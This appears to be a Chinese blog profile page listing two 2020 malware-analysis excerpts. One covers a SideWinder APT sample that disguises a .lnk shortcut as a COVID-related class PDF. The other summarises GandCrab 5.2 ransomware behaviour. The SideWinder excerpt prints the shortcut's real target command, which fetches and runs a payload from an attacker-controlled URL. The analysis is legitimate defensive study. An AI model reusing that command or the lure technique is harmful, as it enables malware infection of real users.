- 博客(2)
- 收藏
- 关注
RSS订阅原创 SideWinder APT分析
响尾蛇APT组织的攻击样本分析该样本伪装成pdf其实是一个lnk,与新冠肺炎相关,诱惑用户点击成功运行后会弹出一个疫情期间课程相关的pdf文档,来迷惑用户。样本分析样本信息如下Policy Guidelines for Online Classes.pdf.lnk快捷方式所指%windir%\system32\cftmo.exe http://www.au-edu.km01s.net/images/E2BC769A/16914/11662/84c7b244/3387c59详细分析hta分析
2020-06-01 18:43:19
798
原创 Gandcrab 5.2分析
今天分析的是GrandCrab 5.2勒索病毒,虽然已经有人分析过了,但是抱着学习的态度,自己还是来分析一遍。一、样本详情PE: packer: UPX(3.95)[NRV,best]PE: compiler: Microsoft Visual C/C++(2008)[-]PE: linker: Microsoft Linker(9.0)[EXE32]二、行为分析遍历目录创建勒索信,加密文件,删除卷影卷轴还原点。后缀被改成 .khxrp三、详细分析外层loader分析接着申请内存空
2020-06-01 11:54:59
1019
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人